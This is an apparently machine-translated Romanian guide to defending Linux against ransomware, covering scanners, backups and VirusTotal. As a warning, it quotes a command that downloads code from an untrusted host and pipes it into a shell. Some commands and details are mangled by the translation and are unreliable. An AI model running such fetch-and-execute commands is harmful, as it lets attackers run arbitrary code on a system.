Cum să protejezi Linux de Ransomwares



Încercați Instrumentul Nostru Pentru Eliminarea Problemelor

Ransomware-ul este una dintre cele mai amenințătoare probleme din lumea securității rețelei de astăzi. Este înfricoșător să crezi că cineva ți-ar putea ține ostatic datele. Unele infecții cu ransomware criptează toate datele dintr-un anumit volum, iar persoanele din spatele acestuia solicită o anumită sumă de bani înainte de a fi de acord să elibereze cheia necesară pentru deblocarea respectivelor date. Este deosebit de îngrijorător pentru persoanele care au investit o mulțime de bani în datele lor. Cu toate acestea, există o mică veste bună pentru utilizatorii Linux.



În cele mai multe situații, este dificil pentru codul ransomware să obțină controlul asupra a mai mult decât doar directorul de bază al unui utilizator. Aceste programe nu au permisiunile pentru a arunca în coșul de gunoi o instalare întreagă. Acesta este motivul pentru ransomware-ul Linux este mai mult o problemă pe serverele în care operatorii au întotdeauna acces root. Ransomware-ul nu ar trebui să fie o problemă pentru utilizatorii Linux și există mai mulți pași care trebuie luați pentru a împiedica să vi se întâmple.



Metoda 1: Apărarea împotriva atacurilor în stil BashCrypt

BasyCrypt este o dovadă a conceptului de ransomware care a dovedit că este posibil să infectăm structurile serverului cu acest tip de cod rău intenționat. Aceasta oferă o linie de bază pentru cum ar putea arăta pachetele ransomware Linux. Deși în prezent sunt mai puțin frecvente, aceleași tipuri de măsuri preventive de bun simț pentru administratorii de servere ale altor platforme funcționează la fel de bine aici. Problema este că în mediile la nivel de întreprindere ar putea exista un număr mare de persoane diferite care folosesc un sistem gazdă.



Dacă rulați un server de mail, poate fi extrem de greu să împiedicați oamenii să facă lucruri prostești. Faceți tot posibilul pentru a reaminti tuturor să nu deschidă atașamente despre care nu sunt siguri și întotdeauna programele malware scanează tot ceea ce este vorba. Un alt lucru care poate ajuta cu adevărat la prevenirea acestui tip de atacuri vine de la vizionarea modului în care instalați binare cu wget. Bineînțeles, serverul dvs. de e-mail lipsește cu siguranță un mediu desktop și probabil că utilizați wget, apt-get, yum sau pacman pentru a gestiona pachetele care vin. Este foarte important să urmăriți ce depozite sunt utilizate în aceste instalații. Uneori, fie veți vedea o comandă care dorește să executați ceva de genul wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, sau ar putea fi în interiorul unui script shell. În ambele moduri, nu îl rulați dacă nu știți la ce servește acel depozit.

Metoda 2: Instalarea unui pachet Scanner

Există mai multe piese de tehnologie open source de scanare malware. ClamAV este de departe cel mai faimos și îl puteți instala pe multe distribuții bazate pe apt folosind:

sudo apt-get install clamav



2016-11-24_215820

Când este instalat, man clamav ar trebui să explice utilizarea în limbaj simplu. Rețineți că, deși poate scana și elimina fișierele infectate, nu poate elimina de fapt codul infecțios dintr-un fișier. Aceasta este o situație totul sau nimic.

Există un al doilea scaner cu care s-ar putea să nu fiți familiarizați, dar este util dacă procesele ascunse vă sperie. Din nou, dacă utilizați o distribuție bazată pe apt, atunci lansați această comandă pentru a instala scanerul de afișare:

sudo apt-get install unhide

2016-11-24_215925

Când este instalat, tastați:

sudo unhide sys

2016-11-24_215954

Aceasta va face o scanare completă a sistemului dvs. pentru orice procese ascunse.

Metoda 4: Păstrarea copiilor de rezervă curate la îndemână

Deși acest lucru nu ar trebui să fie nici măcar o problemă, deoarece toată lumea ar trebui să facă întotdeauna copii de rezervă, dacă aveți copii de siguranță bune, puteți elimina instantaneu ransomware-ul. Ce foarte puțin ransomware există pe platforma Linux tinde să atace fișierele cu extensii specifice platformelor de dezvoltare web. Aceasta înseamnă că, dacă aveți o mulțime de coduri .php, .xml sau .js, veți dori în mod special să faceți o copie de rezervă. Luați în considerare următoarea linie de cod:

tar -cf backups.tar $ (găsi -nume „* .ruby” -sau -nume „* .html”)

Aceasta ar trebui să creeze un fișier mare de arhivare a fișierelor cu fiecare fișier cu extensiile .ruby și .html într-o structură de fișier. Apoi poate fi mutat într-un alt subdirector temporar pentru extracție, pentru a se asigura că crearea acestuia a funcționat corect.

Această arhivă de benzi poate și trebuie mutată într-un volum extern. Desigur, puteți utiliza compresia .bz2, .gz sau .xv înainte de a face acest lucru. Poate doriți să creați copii de rezervă în oglindă copiindu-le pe două volume diferite.

Metoda 5: Utilizarea scanerelor bazate pe web

Poate că ați descărcat un pachet RPM sau DEB de pe un site care promite să conțină software util. Software-ul este, de asemenea, distribuit prin fișiere tar 7z sau comprimate. Utilizatorii de dispozitive mobile pot primi și pachete Android în format APK. Este ușor să le scanați cu un instrument chiar în browser. Îndreptați-l către https://www.virustotal.com/ și, odată cu încărcarea paginii, apăsați butonul „Alegeți fișierul”. Înainte de a încărca, rețineți că acesta este un server public. Deși este sigur și administrat de Alphabet Inc, acesta transferă fișiere public, ceea ce ar putea fi o problemă în unele medii super-sigure. De asemenea, este limitat la 128 MB fișiere.

Selectați fișierul în caseta care apare și selectați deschide. Numele fișierului va apărea pe linia de lângă buton după ce caseta dispare.

Faceți clic pe marele albastru „Scanați-l!” buton. Veți vedea o altă casetă care indică faptul că sistemul vă încarcă fișierul.

Dacă cineva a verificat deja fișierul în prealabil, acesta vă va anunța raportul anterior. Acesta recunoaște acest lucru pe baza unei sume SHA256, care funcționează la fel ca aceleași instrumente din linia de comandă Linux cu care sunteți obișnuiți. Dacă nu, atunci va rula o scanare completă cu 53 de programe de scanare diferite. Câteva dintre ele s-ar putea să expire când rulează fișierul, iar aceste rezultate pot fi ignorate în siguranță.

Unele programe ar putea oferi rezultate diferite decât altele, deci este ușor să eliminați pozitivele false cu acest sistem. Cea mai bună parte este că funcționează între diferite platforme, ceea ce îl face la fel de atractiv, indiferent de distribuția pe care o aveți pe diferite dispozitive. De asemenea, funcționează la fel de bine și din distribuțiile mobile, cum ar fi Android, motiv pentru care este din nou o modalitate excelentă de a inspecta pachetele APK înainte de a le utiliza.

4 minute citite